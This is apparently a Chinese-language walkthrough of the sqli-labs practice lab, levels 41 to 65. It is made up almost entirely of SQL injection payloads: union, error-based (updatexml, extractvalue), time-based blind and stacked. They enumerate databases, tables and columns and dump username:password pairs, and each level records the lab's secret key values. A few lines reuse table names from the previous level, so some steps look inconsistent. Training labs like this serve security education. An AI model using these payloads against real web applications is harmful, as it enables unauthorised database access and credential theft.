Less-41
经检测为数字型注入因为
?id=1 and 1=1 回显正确
?id=1 and 1=2 回显错误
查询相关数据
?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
?id=-1 union select 1,2,group_concat(concat_ws(":",username,password)) from users --+
Less-42堆叠或者直接报错
[']
Update 更新数据后,经过 mysql_real_escape_string()处理后的数据,存入到数据库当中后不会发生变化。在 select 调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入,这关和二次注入的思路是不一样的。
本关从 login.php 源代码中分析可知:
Password 变量在 post 过程中,没有通过 mysql_real_escape_string()函数的处理
的时候密码选项我们可以进行 attack。
登录用户名随意
地址写成:
http://**************/sqli-labs-master/Less-42/login.php
然后查询数据
?login_user=admin&login_password=' and updatexml(1,concat(0x7e,database(),0x7e),1)#
?login_user=admin&login_password=' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)#
?login_user=admin&login_password=' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
?login_user=admin&login_password=' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e),1)#
Less-43
[')]
地址写成:
http://**************/sqli-labs-master/Less-43/login.php
然后查询数据
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,database(),0x7e),1)#
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,version(),0x7e),1)#
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)#
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e),1)#
Less-44
[']
地址写成:
http://**************/sqli-labs-master/Less-44/login.php
然后查询数据
login_user=admin&login_password=' union select 1,group_concat(schema_name),3 from information_schema.schemata#
login_user=admin&login_password=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
login_user=admin&login_password=' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'#
login_user=admin&login_password=' union select 1,group_concat(concat_ws(":",username,password)),3 from users#
Less-45
[')]
地址写成:
http://**************/sqli-labs-master/Less-45/login.php
然后查询数据
login_user=admin&login_password=') union select 1,group_concat(schema_name),3 from information_schema.schemata#
login_user=admin&login_password=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
login_user=admin&login_password=') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'#
login_user=admin&login_password=') union select 1,group_concat(concat_ws(":",username,password)),3 from users#
Less-46
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))--+
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))--+
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e))--+
Less-47
[']
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e))--+
Less-48
?sort=1 and if(length(database())=8,1,sleep(2))--+
?sort=1 and if(substr(database(),1,1)='s',1,sleep(2))--+
?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(2))--+
?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(2))--+
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',1,sleep(2))--+
Less-49
[']
?sort=1' and if(length(database())=8,1,sleep(2))--+
?sort=1' and if(substr(database(),1,1)='s',1,sleep(2))--+
?sort=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(2))--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(2))--+
?sort=1' and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',1,sleep(2))--+
Less-50
?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)#
?sort=1 and updatexml(1,concat(0x7e,version(),0x7e),1)#
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)#
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e),1)#
Less-51
[']
?sort=1' and extractvalue(1,concat(0x7e,database()))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users)))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
Less-52
?sort=1 and if(length(database())=8,1,sleep(2))--+
?sort=1 and if(substr(database(),1,1)='s',1,sleep(2))--+
?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(2))--+
?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(2))--+
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',1,sleep(2))--+
Less-53
[']
?sort=1' and if(length(database())=8,1,sleep(2))--+
?sort=1' and if(substr(database(),1,1)='s',1,sleep(2))--+
?sort=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(2))--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(2))--+
?sort=1' and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',1,sleep(2))--+
Less-54
测试显示位
?id=1' order by 3 --+ // True
?id=1' order by 4 --+ // false
获取库名
?id=0' union select 1,2,database()--+ // True challenges
获取表名
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+//sr2765z6ma
获取列名
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sr2765z6ma'--+//secret_FQHN
获取key
?id=0' union select 1,2,group_concat(secret_FQHN) from sr2765z6ma--+//OtS4hf7GK9E5r36zPaaxYT2S
Less-55
测试显示位
?id=1) order by 3 --+ // True
?id=1) order by 4 --+ // false
获取库名
?id=0) union select 1,2,database()--+ // True challenges
获取表名
?id=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+//ngezf8m9e8
获取列名
?id=0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sr2765z6ma'--+//secret_C41J
获取key
?id=0) union select 1,2,group_concat(secret_FQHN) from sr2765z6ma--+//eIBeUMWtx2vimfrFC6I3tghF
Less55与54不同在于id参数闭合符号为 ( )
database:challenges
table_name:ngezf8m9e8
column_name:secret_C41J
key:eIBeUMWtx2vimfrFC6I3tghF
Less-56
?id=1') order by 3 --+ // True
?id=1) order by 4 --+ // false
获取库名
?id=0') union select 1,2,database()--+ // True challenges
获取表名
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+//0l7axruw24
获取列名
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='0l7axruw24'--+//secret_Q0T4
获取key
?id=0') union select 1,2,group_concat(secret_Q0T4) from 0l7axruw24--+//nfrdtsnM0jL8iwqR6iAGnnc2
56闭合符号为('')
Less-57
?id=1" order by 3 --+ // True
?id=1" order by 4 --+ // false
获取库名
?id=0" union select 1,2,database()--+ // True challenges
获取表名
?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+//udekem1a8m
获取列名
?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='udekem1a8m'--+//secret_DR1P
获取key
?id=0" union select 1,2,group_concat(secret_DR1P) from udekem1a8m--+//jvwbKcrsVpvGG7r72crHote5
57闭合符号为""
Less-58
获取数据库
?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
获取表名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+//oilntvhrkv
获取列名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='oilntvhrkv'),0x7e),1)--+//secret_NJQI
获取key
?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_NJQI) from oilntvhrkv),0x7e),1)--+
edX6kT5tSgbCrTu0XXNmb8oU
#Less-59
获取数据库
?id=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)
获取表名
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) //8nol5dwme6
获取列名
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='8nol5dwme6'),0x7e),1)//secret_UW3B
获取key
?id=1 and updatexml(1,concat(0x7e,(select group_concat(secret_UW3B) from 8nol5dwme6),0x7e),1)//
CKhOaaZqhX9HudYu2rNSRfh9
Less-60
获取数据库
?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
获取表名
?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+//voywesi82a
获取列名
?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='voywesi82a'),0x7e),1)--+//secret_0TB
获取key
?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_0TBA) from voywesi82a),0x7e),1)--+
WP1I1arba3hhwA0fJlk7PCO8
Less-61
获取数据库
?id=1')) and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
获取表名
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+//34tjqs4pst
获取列名
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='34tjqs4pst'),0x7e),1)--+//secret_Y4WV
获取key
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(secret_Y4WV) from 34tjqs4pst),0x7e),1)--+
b9156yzOgwluB2xKyjftrySK
Less-62
经检测
?id=1') and ('1')=('2 回显不正确
?id=1') and ('1')=(' 回显正确
说明是[')]类型
而且无报错所以用延时注入
?id=1') and If(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1)='3',1,sleep(5))-- +//y6q9japcwx
?id=1') and if(substr((select group_concat(column_name) from information_schema.columns where table_name='34tjqs4pst'),1,1)='i',1,sleep(3))--+//secret_YQFI
?id=1') and if(substr((select group_concat(secret_YQFI) from y6q9japcwx limit 0,1),1,1)='S',1,sleep(3))--+//SXpv3ffqjFg940EI999FbPlT
Less-63
类型为[']
其余同Less-62
Less-64
类型为[))]
其余同Less-62
Less-65
类型为[")]
其余同Less-62